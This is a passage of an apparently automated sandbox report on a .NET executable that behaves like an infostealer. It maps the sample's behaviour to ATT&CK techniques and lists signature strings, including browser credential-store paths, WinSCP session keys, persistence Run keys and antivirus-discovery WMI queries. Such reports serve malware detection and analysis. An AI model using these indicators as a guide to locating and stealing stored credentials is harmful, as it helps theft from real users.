"https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials In Files", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001", "malicious_identifiers_count": 1, "parent": {"technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552"}}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"BraveSoftware\\Brave-Browser\\User Data\\Local State\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"Opera Software\\Opera GX Stable\\Login Data\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"Opera Software\\Opera GX Stable\\Local State\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"Opera Software\\Opera Stable\\Login Data\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"Opera Software\\Opera Stable\\Local State\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\n \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" in Source: 6000042-_~_\n \"SOFTWARE\\\\\\\\Martin Prikryl\\\\\\\\WinSCP 2\\\\\\\\Sessions\" in Source: 600007f-_~ReadAccounts\n \"BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default\\\\Login Data\" in Source: 6000087-_~ReadAccounts\n \"BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Local State\" in Source: 6000087-_~ReadAccounts\n \"Software\\\\Microsoft\\\\Internet Explorer\\\\IntelliForms\\\\Storage2\" in Source: 60000d7-_~_\n \"Opera Software\\\\Opera GX Stable\\\\Login Data\" in Source: 600011c-_~ReadAccounts\n \"Opera Software\\\\Opera GX Stable\\\\Local State\" in Source: 600011c-_~ReadAccounts\n \"Opera Software\\\\Opera Stable\\\\Login Data\" in Source: 600011f-_~ReadAccounts\n \"Opera Software\\\\Opera Stable\\\\Local State\" in Source: 600011f-_~ReadAccounts\n \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" in Source: 60001c8-_~_\n \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\" in Source: 60001c8-_~_\n \"SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" in Source: 60001c8-_~_\n \"SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\" in Source: 60001c8-_~_", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-135", "type": 2, "relevance": 1, "name": "Found well known domains (string)", "description": "\"Are you mixing protobuf-net and protobuf-csharp-port? See https://stackoverflow.com/q/11564914/23354; type:\" (Indicator: \"stackoverflow.com\")\n \"; please see https://stackoverflow.com/q/14436606/23354\" (Indicator: \"stackoverflow.com\")\n \"Invalid wire-type; this usually means you have over-written a file without truncating or setting the length; see https://stackoverflow.com/q/2152978/23354\" (Indicator: \"stackoverflow.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 632A0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74DE0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\f7fe927b-ea6e-4d40-b4ed-14c82a26aa0e\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"Local\\f7fe927b-ea6e-4d40-b4ed-14c82a26aa0e\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-16", "type": 2, "relevance": 2, "name": "Contains SQL queries", "description": "\"SELECT Caption FROM Win32_OperatingSystem\" (Source: 9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500, Indicator: \"select caption from win32_operatingsystem\")\n \"SELECT * FROM Win32_BIOS\" (Source: 6000239-_~_, Indicator: \"select * from win32_bios\")\n \"SELECT * FROM Win32_BaseBoard\" (Source: 600023a-_~_, Indicator: \"select * from win32_baseboard\")\n \"SELECT * FROM Win32_Processor\" (Source: 600023b-_~_, Indicator: \"select * from win32_processor\")\n \"Select * From Win32_ComputerSystem\" (Source: 600023c-_~_, Indicator: \"select * from win32_computersystem\")\n \"SELECT * FROM Win32_DisplayConfiguration\" (Source: 600023d-_~_, Indicator: \"select * from win32_displayconfiguration\")\n \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Source: 6000269-_~_, Indicator: \"select * from win32_operatingsystem where primary='true'\")\n \"SELECT * FROM AntivirusProduct\" (Source: 600026b-_~_, Indicator: \"select * from antivirusproduct\")\n \"SELECT * FROM FirewallProduct\" (Source: 600026c-_~_, Indicator: \"select * from firewallproduct\")", "origin": "File/Memory", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-127", "type": 2, "relevance": 1, "name": "Found user-agent related strings", "description": "Found string \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A\" (Indicator: \"mozilla/5.0 (\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found string \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0\" (Indicator: \"mozilla/5.0 (\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"CreateDC\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to API (Indicator: \"DeleteDC\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to API (Indicator: \"CryptHashData\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")\n Found reference to API (Indicator: \"GetProcessById\"; File: \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\system32\\IMM32.DLL\" [Source: 00000000-00005912-00000C60-56380579]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" [Source: 00000000-00005912-00000C28-57299210]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" [Source: 00000000-00005912-00000C28-57559874]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" [Source: 00000000-00005912-00000C28-58434918]\n Observed system executable string:\"%WINDIR%\\system32\\combase.dll\" [Source: 00000000-00005912-00000C28-58554323]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" [Source: 00000000-00005912-00000C28-60084770]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" [Source: 00000000-00005912-00000C28-60524198]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00005912-00000C28-60629762]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll\" [Source: 00000000-00005912-00000C28-60991242]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll\" [Source: 00000000-00005912-00000C28-61147149]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll\" [Source: 00000000-00005912-00000C28-61218509]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll\" [Source: 00000000-00005912-00000C28-61404759]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll\" [Source: 00000000-00005912-00000C28-61584424]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll\" [Source: 00000000-00005912-00000C28-61644666]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll\" [Source: 00000000-00005912-00000C28-61696224]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll\" [Source: 00000000-00005912-00000C28-61759094]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" [Source: 00000000-00005912-00000C28-62098087]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" [Source: 00000000-00005912-00000C28-62589272]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll\" [Source: 00000000-00005912-00000C28-62975369]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" [Source: 00000000-00005912-00000C28-63683081]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"GDI32.DLL\" at base 76e80000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77520000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 708f0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"KERNEL32\" at base 75fd0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"ADVAPI32.DLL\" at base 76fa0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6b7e0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"SHLWAPI.DLL\" at base 75ec0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"VERSION.DLL\" at base 74760000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 646b0000\n \"9a301b34be9ebda00f6c1930c4b56a054683b44a2c59d0017a7a4b2bf39c0500.exe\" loaded module \"USER32.DLL\" at base 76ed0000\n 